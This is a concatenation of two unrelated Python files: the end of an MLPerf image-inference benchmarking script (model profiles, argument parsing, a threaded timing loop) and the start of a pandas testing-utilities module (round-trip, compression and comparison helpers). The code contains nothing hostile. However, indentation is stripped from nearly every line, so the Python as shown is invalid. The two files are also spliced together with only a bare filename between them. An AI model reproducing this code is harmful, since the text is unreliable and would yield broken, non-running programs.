(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False, 0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3], "use_label_map": False}),
}
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True,
help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument(
"--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument(
"--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
)
parser.add_argument("--max-batchsize", type=int,
help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument(
"--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(),
type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true",
help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true",
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true",
help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument(
"--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf",
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float,
help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int,
help="mlperf multi-stream sample per query")
parser.add_argument("--model-threads", type=int, default=0,
help="the number of threads the model should run for inferencing a single query")
parser.add_argument("--clients", type=int, default=1,
help="the number of clients/processes")
args = parser.parse_args()
    # don't use defaults in argparse; instead start from a defaults dict, override it
    # with the selected profile, and use those values unless the command line overrides them
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
return args
def main():
args = get_args()
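    # NOTE: the backend is hard-coded to onnxruntime here; the --backend flag parsed
    # above is not used by this harness.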
backend = get_backend("onnxruntime")
image_format = args.data_format if args.data_format else backend.image_format()
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
cli_colors.color_print("Building Dataset", cli_colors.YELLOW, cli_colors.MOD_BOLD)
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count = args.count,
**kwargs)
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs, threads=args.model_threads)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
count = ds.get_item_count()
query_size = args.samples_per_query
cli_colors.color_print(f"Total Samples: {count}, Query Size: {query_size}", cli_colors.YELLOW_SHADE2)
inference_time = []
def handle_tasks(tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
s = time.time()
model.predict(qitem)
e = time.time()
inference_time.append((e-s))
tasks_queue.task_done()
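    # Pre-load every sample into memory, group them into queries of query_size images
    # each, and push the batched feed dicts onto a queue consumed by the worker threads.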
ds.load_query_samples(list(range(count)))
queries = Queue()
for i in range(0, count, query_size):
img, _ = ds.get_samples(list(range(i, i+query_size)))
queries.put({backend.inputs[0]: img})
workers = []
for i in range(args.clients):
worker = threading.Thread(target=handle_tasks, args=(queries,))
worker.daemon = True
workers.append(worker)
queries.put(None)
worker.start()
for w in workers:
w.join()
print(queries.qsize())
ds.unload_query_samples(None)
df = pd.DataFrame(inference_time)
df.to_csv("inference_times.csv")
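# Example invocation (a sketch only; the model and dataset paths below are placeholders,
# and --samples-per-query must be supplied because it has no default):
#   python no_loadgen.py --profile resnet50-onnxruntime --model resnet50.onnx \
#       --dataset-path /data/imagenet --samples-per-query 8 --clients 2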
if __name__ == "__main__":
main()
|
testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import _get_lzma_file, _import_lzma, raise_with_traceback
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
"""
Pickle an object and then read it again.
Parameters
----------
obj : pandas object
The object to pickle and then re-read.
path : str, default None
The path where the pickled object is written and then read.
Returns
-------
round_trip_pickled_object : pandas object
The original object that was pickled and then re-read.
"""
if path is None:
path = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
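# A minimal usage sketch (the DataFrame below is hypothetical, not part of this module):
#   df = pd.DataFrame({"a": [1, 2, 3]})
#   assert_frame_equal(round_trip_pickle(df), df)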
def round_trip_pathlib(writer, reader, path=None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path=None):
"""
Write an object to file specified by a py.path LocalPath and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object
Parameters
----------
path : str
The path where the file is read from
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
f : file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool / string {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""Generate an array of byte strings."""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""Generate an array of unicode strings."""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(
"Couldn't close file descriptor: {fdesc} (file: {fname})".format(
fdesc=fd, fname=filename
)
)
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
labels = index.codes[level]
filled = take_1d(unique.values, labels, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = "{obj} levels are different".format(obj=obj)
msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = "{obj} length are different".format(obj=obj)
msg2 = "{length}, {left}".format(length=len(left), left=left)
msg3 = "{length}, {right}".format(length=len(right), right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for more user-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = "MultiIndex level [{level}]".format(level=level)
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
def assert_class_equal(left, right, exact=True, obj="Input"):
"""checks classes are equal."""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return x.__class__.__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = "{obj} classes are not equivalent".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = "{obj} classes are different".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = 'Attribute "{attr}" are different'.format(attr=attr)
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, type "
"encountered {name!r}"
).format(name=el.__class__.__name__)
assert isinstance(el, (plt.Axes, dict)), msg
else:
assert isinstance(objs, (plt.Artist, tuple, dict)), (
"objs is neither an ndarray of Artist instances nor a "
'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
name=objs.__class__.__name__
)
)
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(
left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
)
assert_numpy_array_equal(
left.codes,
right.codes,
check_dtype=check_dtype,
obj="{obj}.codes".format(obj=obj),
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj="{obj}.categories".format(obj=obj),
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj="{obj}.values".format(obj=obj),
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(
left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_index_equal(
left.right, right.right, exact=exact, obj="{obj}.right".format(obj=obj)
)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(
left._data, right._data, obj="{obj}.values".format(obj=obj)
)
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
obj=obj, message=message, left=left, right=right
)
if diff is not None:
msg += "\n[diff]: {diff}".format(diff=diff)
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
""" Checks that 'np.ndarray' is equivalent
Parameters
----------
left : np.ndarray or iterable
right : np.ndarray or iterable
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype: bool, default True
check dtype if both a and b are np.ndarray
err_msg : str, default None
If provided, used as assertion message
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
elif check_same == "copy":
if left_base is right_base:
msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shapes are different".format(obj=obj),
left.shape,
right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
